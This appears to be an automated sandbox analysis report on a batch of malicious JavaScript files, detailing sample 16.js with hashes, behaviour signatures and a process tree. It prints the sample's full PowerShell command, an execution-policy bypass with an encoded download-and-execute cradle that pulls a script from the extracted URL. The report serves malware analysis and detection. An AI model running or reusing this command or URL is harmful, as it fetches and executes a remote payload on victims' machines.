Overview
overview
10Static
static
1½�...�/1.js
windows7-x64
10½�...�/1.js
windows10-2004-x64
10½�.../10.js
windows7-x64
8½�.../10.js
windows10-2004-x64
8½�.../11.js
windows7-x64
3½�.../11.js
windows10-2004-x64
8½�.../12.js
windows7-x64
8½�.../12.js
windows10-2004-x64
8½�.../13.js
windows7-x64
3½�.../13.js
windows10-2004-x64
8½�.../14.js
windows7-x64
3½�.../14.js
windows10-2004-x64
8½�.../15.js
windows7-x64
10½�.../15.js
windows10-2004-x64
10½�.../16.js
windows7-x64
10½�.../16.js
windows10-2004-x64
10½�.../17.js
windows7-x64
3½�.../17.js
windows10-2004-x64
7½�.../18.js
windows7-x64
3½�.../18.js
windows10-2004-x64
7½�.../19.js
windows7-x64
3½�.../19.js
windows10-2004-x64
8½�...�/2.js
windows7-x64
10½�...�/2.js
windows10-2004-x64
10½�.../20.js
windows7-x64
10½�.../20.js
windows10-2004-x64
10½�.../21.js
windows7-x64
1½�.../21.js
windows10-2004-x64
1½�.../22.js
windows7-x64
10½�.../22.js
windows10-2004-x64
10½�.../23.js
windows7-x64
3½�.../23.js
windows10-2004-x64
8Analysis
-
max time kernel
122s -
max time network
128s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
14-10-2023 03:57
Static task
static1
Behavioral task
behavioral1
Sample
½ļ/1.js
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
½ļ/1.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral3
Sample
½ļ/10.js
Resource
win7-20230831-en
Behavioral task
behavioral4
Sample
½ļ/10.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral5
Sample
½ļ/11.js
Resource
win7-20230831-en
Behavioral task
behavioral6
Sample
½ļ/11.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral7
Sample
½ļ/12.js
Resource
win7-20230831-en
Behavioral task
behavioral8
Sample
½ļ/12.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral9
Sample
½ļ/13.js
Resource
win7-20230831-en
Behavioral task
behavioral10
Sample
½ļ/13.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral11
Sample
½ļ/14.js
Resource
win7-20230831-en
Behavioral task
behavioral12
Sample
½ļ/14.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral13
Sample
½ļ/15.js
Resource
win7-20230831-en
Behavioral task
behavioral14
Sample
½ļ/15.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral15
Sample
½ļ/16.js
Resource
win7-20230831-en
Behavioral task
behavioral16
Sample
½ļ/16.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral17
Sample
½ļ/17.js
Resource
win7-20230831-en
Behavioral task
behavioral18
Sample
½ļ/17.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral19
Sample
½ļ/18.js
Resource
win7-20230831-en
Behavioral task
behavioral20
Sample
½ļ/18.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral21
Sample
½ļ/19.js
Resource
win7-20230831-en
Behavioral task
behavioral22
Sample
½ļ/19.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral23
Sample
½ļ/2.js
Resource
win7-20230831-en
Behavioral task
behavioral24
Sample
½ļ/2.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral25
Sample
½ļ/20.js
Resource
win7-20230831-en
Behavioral task
behavioral26
Sample
½ļ/20.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral27
Sample
½ļ/21.js
Resource
win7-20230831-en
Behavioral task
behavioral28
Sample
½ļ/21.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral29
Sample
½ļ/22.js
Resource
win7-20230831-en
Behavioral task
behavioral30
Sample
½ļ/22.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral31
Sample
½ļ/23.js
Resource
win7-20230831-en
Behavioral task
behavioral32
Sample
½ļ/23.js
Resource
win10v2004-20230915-en
General
-
Target
½ļ/16.js
-
Size
32KB
-
MD5
1b0eaa2c2511d5c5bf2fff542b172a49
-
SHA1
bce5600d8e4bb7353b67f52a388e56063fd1ae85
-
SHA256
2d16b8541eb251e09be8589e1d140a14f8392cc055d3b15936edcddad91b5923
-
SHA512
e2e4ac0468a3637bdcb2598444759856f547624e07a87837ed501199947dbf1435e2fef60f66d182c72159b5a06395cb5d39411b5df9f7c3a55c2c40a8fa7511
-
SSDEEP
384:IsDLhfkGwaE6EIWNIalL+W9zCdrnQfF+M5WHZX8thvrtVOETBFtXBRo3yhuiUhR0:XMhIzWOzQfFb5q8hfjWouiwRoz2y
Malware Config
Extracted
https://bikexiner.lotieneconisiore.com/file1.ps1
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2740 powershell.exe 6 2740 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2836 powershell.exe 2740 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2836 powershell.exe Token: SeDebugPrivilege 2740 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2240 wrote to memory of 2836 2240 wscript.exe 28 PID 2240 wrote to memory of 2836 2240 wscript.exe 28 PID 2240 wrote to memory of 2836 2240 wscript.exe 28 PID 2836 wrote to memory of 2740 2836 powershell.exe 30 PID 2836 wrote to memory of 2740 2836 powershell.exe 30 PID 2836 wrote to memory of 2740 2836 powershell.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\½ļ\16.js1⤵
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" PowersheLL -eP byPASs -EnC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBiAGkAawBlAHgAaQBuAGUAcgAuAGwAbwB0AGkAZQBuAGUAYwBvAG4AaQBzAGkAbwByAGUALgBjAG8AbQAvAGYAaQBsAGUAMQAuAHAAcwAxACIAKQA=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eP byPASs -EnC SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBiAGkAawBlAHgAaQBuAGUAcgAuAGwAbwB0AGkAZQBuAGUAYwBvAG4AaQBzAGkAbwByAGUALgBjAG8AbQAvAGYAaQBsAGUAMQAuAHAAcwAxACIAKQA=3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2740
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5fd35708ef8c43c48276378a16562d439
SHA1372c10bf593d7cad8f2faf9eca3404e41a6b23a2
SHA256a3437a6e90f9a18c712f4a3aac95dd060eaa948a13b1d5b29d13ebed08699f7b
SHA512cc6fd48fc54ba04b0052ca6d19e1e7005f5c2e04c0a10324fe634097f89b3d19ec7303789645bed8ad3b449edea6029193338ab967d67676d71aea437bd71ac4
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SNGXC9TSJXLOET5RXJ1R.temp
Filesize7KB
MD5fd35708ef8c43c48276378a16562d439
SHA1372c10bf593d7cad8f2faf9eca3404e41a6b23a2
SHA256a3437a6e90f9a18c712f4a3aac95dd060eaa948a13b1d5b29d13ebed08699f7b
SHA512cc6fd48fc54ba04b0052ca6d19e1e7005f5c2e04c0a10324fe634097f89b3d19ec7303789645bed8ad3b449edea6029193338ab967d67676d71aea437bd71ac4